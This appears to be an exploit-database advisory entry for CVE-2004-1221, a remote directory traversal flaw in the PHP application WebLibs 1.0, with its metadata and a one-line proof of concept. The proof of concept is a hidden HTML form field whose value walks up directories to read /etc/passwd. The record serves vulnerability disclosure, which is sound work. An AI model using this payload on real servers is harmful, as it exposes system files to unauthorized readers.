darryl burgdorf weblibs 1.0 - Directory Traversal

Author: John Bissell
type: webapps
platform: php
port: 
date_added: 2004-12-07  
date_updated: 2013-03-15  
verified: 1  
codes: CVE-2004-1221;OSVDB-12273  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 24806.txt  
source: https://www.securityfocus.com/bid/11848/info

It is reported that WebLibs is prone to a remote directory traversal vulnerability. This issue is due to a failure of the application to properly filter user-supplied input.

WebLibs 1.0 is affected by this vulnerability.

The following proof of concept is available:
<INPUT type=hidden value="/../../../../../etc/passwd" name="TextFile">